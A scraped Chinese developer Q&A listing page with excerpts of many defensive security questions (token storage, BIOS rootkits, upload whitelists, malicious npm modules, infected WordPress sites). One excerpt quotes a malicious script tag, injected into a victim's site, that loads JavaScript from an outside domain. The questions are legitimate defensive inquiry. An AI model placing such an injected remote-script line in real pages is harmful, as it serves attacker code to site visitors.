我正在阅读文档,但找不到SDK如何在设备上保存刷新令牌,以便在应用程序被杀死时能够让用户进行身份验证。
有人对此有什么见解吗?
浏览 12提问于2022-05-06得票数 5
1回答
我读到了一些BIOS漏洞和rootkit,这些漏洞和rootkit将恶意代码闪现到BIOS,以便在工厂重置/操作系统安装或硬盘更换之后保持访问,我想知道是否应该更新BIOS,如果有更新,我在网上读到更新或者有更好的方法来防止恶意软件访问BIOS,并且可以说恶意软件可以远程刷新代码或物理访问所需的权限?
浏览 0提问于2019-08-14得票数 0
3回答
在上传时,zip由服务器解压缩,每个文件都被循环起来,检查它的扩展名和一个白名单,允许:
游戏然后转移到我们的静态无炊事域(scirra.net)。这将防止恶意JS访问scirra.com cookie。
这个iframe技术和白名单是否足够全面,以防止任何恶意的行为?注意,我们不能真正地屏蔽每个JS文
浏览 16提问于2011-11-22得票数 10
就我的Template.JS使用数组和克隆的能力而言,我担心黑客可能会将恶意脚本输入到数组中,并使用恶意数据输入创建另一个克隆框。如何防止有人向阵列中输入恶意数据?如果有一个插件或脚本可以防止恶意数据出现在数组中,那就太棒了!我知道有一件事,你不能在输入中插入代码。但我担心任何浏览器中的console.log可能会干扰...?
浏览 31提问于2017-06-18得票数 1
回答已采纳
我正在使用Node.js创建web服务。在实现过程中,我使用了许多通过npm安装的第三方模块。如果使用的模块中存在恶意*.js脚本,则存在安全性问题。例如,恶意代码可能会删除我的所有磁盘文件,或者安静地收集机密数据。
谢谢,杰弗里
浏览 1提问于2013-08-02得票数 5
回答已采纳
1回答
我想知道,如果某个用户的' admin‘令牌被窃取,而恶意用户在localStorage中的旧’非管理‘令牌被替换为'admin’令牌,那么他将有权访问管理路由。为了在某种程度上防止这种情况:
例如,I将在10分钟内刷新令牌(但恶意用户在这10分钟内可能会做很多错误的思考--从DB删除用户、删除配置等)。还有其他方法来防止这10分钟的“可能攻击”吗?因此,当'admin‘令牌被盗时,恶意用户不能像在localStorage ?中那样复制粘贴新令牌
浏览 1提问于2020-12-28得票数 2
2回答
现在,为了避免恶意链接或JS/HTML/PHP代码被插入到可以执行的注释中。我如何防止这种情况发生?假设注释是一个JS代码..喜欢我该如何防止这种情况呢?谢谢。
浏览 1提问于2014-01-17得票数 2
我想让用户输入一个字符串,该字符串将在math.js中作为表达式进行计算。我可以做些什么来防止恶意使用此功能?
浏览 4提问于2015-02-13得票数 2
3回答
我的公司几年前建立的一个wordpress站点看起来被恶意软件感染了。我们应该怎么做才能从站点中过滤出恶意软件,并防止这种情况再次发生?非常感谢您的任何建议。它看起来像是嵌入了图像文件的地方,这段代码是嵌入的:
<script src='https://traffictrade.life/scripts.js' type='text/javascript'>
浏览 1提问于2017-07-17得票数 2
我希望允许我的网站的用户使用node.js保存公共图像文件。我应该做些什么来遵循安全图像存储的最佳实践?如何防止恶意软件上传?webp;image/x-jng jng;我还应该考虑什么来防止恶意软件上传呢
浏览 2提问于2020-05-27得票数 0
3回答
还恶意插入
我见过这个问题,但没有一个回答对我有效(更确切地说,我太蠢了,无法让它们起作用)。我想我需要个性化的帮助。每次我刷新我的php页面时,它都会插入空白数据。如何防止插入空白和/或恶意数据。
浏览 3提问于2012-01-10得票数 4
回答已采纳
1回答
为了防止重复请求密钥,我正在考虑以一种或另一种形式将密钥临时存储在vuex中。我应该注意的安全问题是什么?另外,在vuex中存储密钥的最佳策略是什么?
浏览 3提问于2020-06-19得票数 1
3回答
我已经读到了很多关于多态和变质恶意软件的文章,以及一旦他们被发现就如何逃避基于签名的检测。这些技术似乎被用来避免AVs和IDS的反复检测。我突然意识到,恶意软件作者的首要目标可能是防止他们的恶意软件被分析。是否有类似的技术,恶意软件作者已经使用,以防止他们的恶意软件第一次被发现,使他们永远不会得到报告/分析的第一?
浏览 0提问于2019-10-29得票数 6
Js文件将被下载当某人访问一个网站,如果有人编辑下载的js脚本并插入他自己的代码,然后刷新网站。在新的刷新中,网站将读取已编辑的Js文件并运行恶意代码。恶意代码可用于以正常方式在服务器上运行某些代码。用户只能在自己的页面上发布一篇文章:
<?$_POST["targetPage"];
Publish
浏览 8提问于2014-01-21得票数 6
回答已采纳
什么可以防止SDK JS代码(以及后续的iframe)被加载到恶意站点并用于访问用户创建的配置文件来加密/解密数据?
浏览 3提问于2019-07-10得票数 1
我想防止恶意程序访问我的电脑通过USB。我的思路如下:我只是一个普通公民,有一份不危险的工作。然而,我生活在一个不关心数据隐私和安全的国家。这是否意味着攻击者可以使用恶意有效载荷来刷新我的USB?
浏览 0提问于2020-10-20得票数 1
2回答
我听说过框架和BCL中的安全特性,但这与防止恶意程序员编写有害软件或防止恶意软件在CLR上运行有关吗?例如,有没有可能用C#编写一个程序,对Windows文件夹进行有害的更改?
浏览 2提问于2009-02-07得票数 4
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频活动推荐
腾讯云开发者
